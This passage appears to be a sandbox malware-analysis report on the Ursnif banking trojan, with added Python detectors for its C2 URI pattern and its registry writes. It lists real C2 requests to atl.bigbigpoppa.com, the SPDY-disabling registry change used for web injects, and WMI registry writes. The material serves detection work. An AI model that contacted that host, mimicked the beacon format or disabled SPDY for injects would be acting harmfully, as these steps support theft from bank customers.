Source: global traffic | HTTP traffic detected: GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected: GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: Joe Sandbox View | ASN Name: SPRINTHOSTRU SPRINTHOSTRU
Source: Joe Sandbox View | IP Address: 185.251.90.253 185.251.90.253
Source: rundll32.exe, 00000015.00000003.618180759.00000000008E3000.00000004.00000001.sdmp | String found in binary or memory: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P
Source: rundll32.exe, 00000015.00000002.737109785.000000000088A000.00000004.00000020.sdmp | String found in binary or memory: http://atl.bigbigpoppa.com/t
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001F.00000003.646082530.00000217679BC000.00000004.00000001.sdmp | String found in binary or memory: http://crl.m5
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001F.00000002.742877071.000002174F421000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001F.00000003.643291434.0000021767840000.00000004.00000001.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | DNS traffic detected: queries for: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected: GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected: GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
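The three C2 requests above share a shape a network analyst can key on without any decryption: a very long path of many short pseudo-random segments, no file extension, repeated `_2F` / `_2B` tokens (some split across a slash, e.g. `xJlNu7xTm_/2BJVkAx`), `Cache-Control` and `Pragma: no-cache` on a plain GET, and a Firefox User-Agent with none of the `Accept*` headers a browser sends. The following Python is an added example, not part of this sandbox report: it parses raw HTTP/1.1 requests and scores them against those traits. The three request strings are copied from the report; the benign request, the scoring weights and the threshold are constructed here. The `desubstitute` step (strip the slashes, then map `_2F`, `_2B`, `_2D` back to `/`, `+`, `=`) reflects the URI encoding described in public ISFB/Gozi write-ups and is an assumption, not something this report states; the example only checks that the result stays within the base64 alphabet and does not try to decrypt it.

```python
"""Heuristic triage of raw HTTP requests for the Ursnif C2 URI shape seen in the report.

Added example, not part of the sandbox report. URSNIF_REQ_1..3 are copied from the
report; BENIGN_REQ is constructed as a negative control. Scoring is a hand-picked
heuristic, not a vendor signature.
"""
import re
from urllib.parse import urlsplit

FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0"
C2_HEADERS = (
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n"
    f"User-Agent: {FIREFOX_UA}\r\nHost: atl.bigbigpoppa.com\r\n\r\n"
)
URSNIF_REQ_1 = "GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1\r\n" + C2_HEADERS
URSNIF_REQ_2 = "GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1\r\n" + C2_HEADERS
URSNIF_REQ_3 = "GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1\r\n" + C2_HEADERS
# Constructed benign request: a normal browser fetch of a static asset.
BENIGN_REQ = (
    "GET /static/js/app.min.js?v=2021.08 HTTP/1.1\r\n"
    "Accept: */*\r\nAccept-Encoding: gzip, deflate, br\r\n"
    f"User-Agent: {FIREFOX_UA}\r\nHost: www.example.com\r\n\r\n"
)

TOKEN_RE = re.compile(r"_2[BFD]")  # "_2B", "_2F", "_2D": '+', '/', '=' with '%' swapped for '_'
B64_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers); header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def desubstitute(path: str) -> str:
    """Assumed reversal of the URI encoding (from public ISFB write-ups, not this report):
    drop the inserted slashes first so a token split like "Tm_/2BJV" is repaired, then
    map _2F/_2B/_2D back to the base64 characters '/', '+', '='."""
    joined = path.replace("/", "")
    return joined.replace("_2F", "/").replace("_2B", "+").replace("_2D", "=")


def triage(raw: str, threshold: int = 5) -> dict:
    """Score one raw request; 'flagged' is True when the score reaches the threshold."""
    method, target, headers = parse_request(raw)
    path = urlsplit(target).path
    segments = [s for s in path.split("/") if s]
    tokens = len(TOKEN_RE.findall(path.replace("/", "")))  # count after removing slashes
    last = segments[-1] if segments else ""
    has_extension = bool(re.search(r"\.[A-Za-z0-9]{1,5}$", last))
    candidate = desubstitute(path)
    score, reasons = 0, []
    if len(segments) >= 8:
        score += 2; reasons.append(f"{len(segments)} path segments")
    if tokens >= 3:
        score += 3; reasons.append(f"{tokens} _2F/_2B/_2D tokens")
    if segments and not has_extension:
        score += 1; reasons.append("no file extension on the last segment")
    if headers.get("cache-control", "").lower() == "no-cache" and headers.get("pragma", "").lower() == "no-cache":
        score += 1; reasons.append("Cache-Control and Pragma no-cache on a GET")
    if "firefox" in headers.get("user-agent", "").lower() and "accept" not in headers:
        score += 1; reasons.append("Firefox UA but no Accept header (a browser sends one)")
    return {
        "host": headers.get("host", ""),
        "method": method,
        "segments": len(segments),
        "tokens": tokens,
        "candidate": candidate,
        "candidate_is_b64_alphabet": bool(candidate) and set(candidate) <= B64_ALPHABET,
        "score": score,
        "reasons": reasons,
        "flagged": score >= threshold,
    }


if __name__ == "__main__":
    for req in (URSNIF_REQ_1, URSNIF_REQ_2, URSNIF_REQ_3, BENIGN_REQ):
        r = triage(req)
        print(f"{r['host']:<22} flagged={r['flagged']!s:<5} score={r['score']} "
              f"segments={r['segments']} tokens={r['tokens']} b64ok={r['candidate_is_b64_alphabet']}")
        for reason in r["reasons"]:
            print("   -", reason)
```

Run it against a proxy or Zeek `http.log` export by feeding each reconstructed request to `triage()`. The token count is taken after the slashes are removed so that tokens the encoder split across a segment boundary still count; the `Accept`-header check is deliberately weak on its own (plenty of scripted clients omit it) and only contributes one point.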

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY

                    E-Banking Fraud:

Yara detected Ursnif (the same Yara matches as listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above; the report files this signature under both categories)
Disables SPDY (a multiplexed, header-compressing HTTP transport; disabling it keeps browser traffic on plain HTTP/1.1, which is likely done so web injects can parse and alter it). Note that the writing process is explorer.exe, a trusted binary into which the report shows code being injected, so a rule keyed on the writer's image would miss this; key on the value instead.
Source: C:\Windows\explorer.exe | Registry key value created / modified: key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value EnableSPDY3_0, data 0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function 21_2_00E53276: CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, memcpy, CryptEncrypt, CryptDecrypt, GetLastError, GetLastError, CryptDestroyKey, GetLastError, CryptReleaseContext, GetLastError

                    System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
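Two registry behaviours in this report are worth turning into host-side checks: the `EnableSPDY3_0 = 0` write under `Internet Settings` (made from explorer.exe, i.e. from the injected host, not from the dropper), and the value writes that rundll32.exe routes through WMI's `StdRegProv` methods. The second matters for attribution: `StdRegProv` executes inside the WMI provider host (WmiPrvSE.exe), so in registry telemetry the writer appears to be WmiPrvSE.exe rather than the calling rundll32.exe, and tying the write back to the caller needs the WMI side (for example WMI-Activity tracing or EDR WMI telemetry that records the `ExecMethod` call and its client process). The Python below is an added example, not part of the sandbox report: it evaluates constructed records modelled on Sysmon Event ID 13 (RegistryEvent, SetValue) fields, with a made-up user SID and a made-up vendor key; none of it is telemetry from this run.

```python
"""Registry-event checks for the two behaviours this report lists: EnableSPDY3_0 set to 0,
and registry value writes performed through WMI's StdRegProv (visible as WmiPrvSE.exe).

Added example, not part of the sandbox report. Events are constructed, modelled on
Sysmon Event ID 13 fields (Image, TargetObject, Details); the SID and the
"ConstructedVendor" key are placeholders.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class RegSetValue:
    image: str           # process that performed the write, as the OS saw it
    target_object: str   # full value path; Sysmon renders HKCU as HKU\<SID>\...
    details: str         # Sysmon renders DWORDs as "DWORD (0x00000000)"


# Constructed sample. The SID is a placeholder, not a real account.
USER_HIVE = r"HKU\S-1-5-21-1000-1000-1000-1001"
INTERNET_SETTINGS = USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
EXPLORER = r"C:\Windows\explorer.exe"
WMIPRVSE = r"C:\Windows\System32\wbem\WmiPrvSE.exe"

EVENTS = [
    # 0: the write the report attributes to explorer.exe
    RegSetValue(EXPLORER, INTERNET_SETTINGS + r"\EnableSPDY3_0", "DWORD (0x00000000)"),
    # 1-2: writes that rundll32.exe issued via StdRegProv; the OS-level writer is WmiPrvSE.exe
    RegSetValue(WMIPRVSE, USER_HIVE + r"\Software\ConstructedVendor\Client\Config", "Binary Data"),
    RegSetValue(WMIPRVSE, USER_HIVE + r"\Software\ConstructedVendor\Client\Name", "Stage1"),
    # 3: benign explorer.exe write to a neighbouring value
    RegSetValue(EXPLORER, INTERNET_SETTINGS + r"\ProxyEnable", "DWORD (0x00000000)"),
    # 4: SPDY being re-enabled, which must not fire
    RegSetValue(EXPLORER, INTERNET_SETTINGS + r"\EnableSPDY3_0", "DWORD (0x00000001)"),
]

SPDY_VALUE_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnableSPDY3_0$",
    re.IGNORECASE,
)
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")
WMI_PROVIDER_HOST_SUFFIX = r"\wbem\wmiprvse.exe"


def dword_value(details: str):
    """Parse Sysmon's DWORD rendering; None for non-DWORD details such as 'Binary Data'."""
    m = DWORD_RE.fullmatch(details.strip())
    return int(m.group(1), 16) if m else None


def check_event(ev: RegSetValue) -> list:
    """Return the rule names the event triggers (possibly several, possibly none)."""
    findings = []
    # Keyed on the value, not the image: the writer here is a trusted, injected process.
    if SPDY_VALUE_RE.search(ev.target_object) and dword_value(ev.details) == 0:
        findings.append("spdy_disabled")
    # StdRegProv runs inside the provider host, so the registry event names WmiPrvSE.exe.
    # Treat any value write from it as 'registry write via WMI' and correlate with the
    # ExecMethod caller on the WMI side to recover the real requesting process.
    if ev.image.lower().endswith(WMI_PROVIDER_HOST_SUFFIX):
        findings.append("registry_write_via_wmi")
    return findings


def scan(events) -> list:
    """Flatten (event, rule) pairs for every triggered rule."""
    return [(ev, rule) for ev in events for rule in check_event(ev)]


if __name__ == "__main__":
    for ev, rule in scan(EVENTS):
        print(f"{rule:<24} {ev.image}  ->  {ev.target_object}  [{ev.details}]")
```

Feed real Sysmon 13 events into `RegSetValue` (Image, TargetObject, Details map one-to-one) to use this outside the sample; the `registry_write_via_wmi` rule is intentionally broad and is meant to be joined against WMI telemetry rather than alerted on alone.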
Source: C:\Windows\SysWOW64\rundll32.exe | Code functions: 21_2_00E5725F, 21_2_00E57E30, 21_2_00E51754, 21_2_05593570, 21_2_05575C88, 21_2_055710E6, 21_2_055790A1, 21_2_05587B5D, 21_2_05584B1F, 21_2_055843B9, 21_2_0557FBA9, 21_2_0557423D, 21_2_0558DAED, 21_2_055952A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code functions: 31_2_000002174F3EE95C, 31_2_000002174F3FB948, 31_2_000002174F3FB230, 31_2_000002174F3F06B4, 31_2_000002174F3F6EA0, 31_2_000002174F3E6684, 31_2_000002174F3D76F4, 31_2_000002174F3F5ED8, 31_2_000002174F3EC6C4, 31_2_000002174F3E2EC0, 31_2_000002174F3F2EF8, 31_2_000002174F3E559C, 31_2_000002174F3E1DF4, 31_2_000002174F3F4DE0, 31_2_000002174F3E5DBC, 31_2_000002174F3D3610, 31_2_000002174F3D74A4, 31_2_000002174F3E4484, 31_2_000002174F3E9500, 31_2_000002174F3D4B60, 31_2_000002174F3F4354, 31_2_000002174F3D1348, 31_2_000002174F3E8340, 31_2_000002174F3FA3A4, 31_2_000002174F3F4BA0, 31_2_000002174F3DABDC, 31_2_000002174F3F9408, 31_2_000002174F3F3400, 31_2_000002174F3EBA74, 31_2_000002174F3D9AD8, 31_2_000002174F3ED328, 31_2_000002174F3F730C, 31_2_000002174F3F5164, 31_2_000002174F3E1164, 31_2_000002174F3E4150, 31_2_000002174F3D0000, 31_2_000002174F3D2138, 31_2_000002174F3EA9F8, 31_2_000002174F3E70C8, 31_2_000002174F3F88B8, 31_2_000002174F3E0124, 31_2_000002174F3D90FC, 31_2_000002174F404796, 31_2_000002174F3EF7B4, 31_2_000002174F3EA790, 31_2_000002174F3E7820, 31_2_000002174F3D1000
Source: C:\Windows\System32\control.exe | Code functions: 38_2_000DB948, 38_2_000CE95C, 38_2_000DB230, 38_2_000D3400, 38_2_000B1000, 38_2_000C7820, 38_2_000D88B8, 38_2_000C70C8, 38_2_000B90FC, 38_2_000C0124, 38_2_000B2138, 38_2_000C6944, 38_2_000C4150, 38_2_000C1164, 38_2_000D5164, 38_2_000CA9F8, 38_2_000CBA74, 38_2_000B9AD8, 38_2_000D730C, 38_2_000CD328, 38_2_000B1348, 38_2_000C8340, 38_2_000D4354, 38_2_000B4B60, 38_2_000DA3A4, 38_2_000D4BA0, 38_2_000BABDC, 38_2_000D9408, 38_2_000C4484, 38_2_000B74A4, 38_2_000C9500, 38_2_000C559C, 38_2_000C5DBC, 38_2_000D4DE0, 38_2_000C1DF4, 38_2_000B3610, 38_2_000C6684, 38_2_000D6EA0, 38_2_000D06B4, 38_2_000CC6C4, 38_2_000C2EC0, 38_2_000D5ED8, 38_2_000D2EF8, 38_2_000B76F4, 38_2_000CA790, 38_2_000CF7B4
Source: C:\Windows\System32\rundll32.exe | Code functions: 40_2_00000195D8ADB948, 40_2_00000195D8ADB230, 40_2_00000195D8ADA3A4, 40_2_00000195D8AD4BA0, 40_2_00000195D8ACF7B4, 40_2_00000195D8ACA790, 40_2_00000195D8ABABDC, 40_2_00000195D8ACD328, 40_2_00000195D8AD2EF8, 40_2_00000195D8AD730C, 40_2_00000195D8AB4B60, 40_2_00000195D8AC8340, 40_2_00000195D8AD4354, 40_2_00000195D8AB1348, 40_2_00000195D8AB74A4, 40_2_00000195D8AC4484, 40_2_00000195D8AD88B8, 40_2_00000195D8AC70C8, 40_2_00000195D8AC7820, 40_2_00000195D8AB1000, 40_2_00000195D8AD3400, 40_2_00000195D8AD9408, 40_2_00000195D8AC559C, 40_2_00000195D8AD4DE0, 40_2_00000195D8AC1DF4, 40_2_00000195D8AC5DBC, 40_2_00000195D8AC0124, 40_2_00000195D8AC9500, 40_2_00000195D8AB90FC, 40_2_00000195D8AD5164, 40_2_00000195D8AC1164, 40_2_00000195D8ACE95C, 40_2_00000195D8AC6944, 40_2_00000195D8AB2138, 40_2_00000195D8AC4150, 40_2_00000195D8AD6EA0, 40_2_00000195D8AD06B4, 40_2_00000195D8AC6684, 40_2_00000195D8AB9AD8, 40_2_00000195D8AD5ED8, 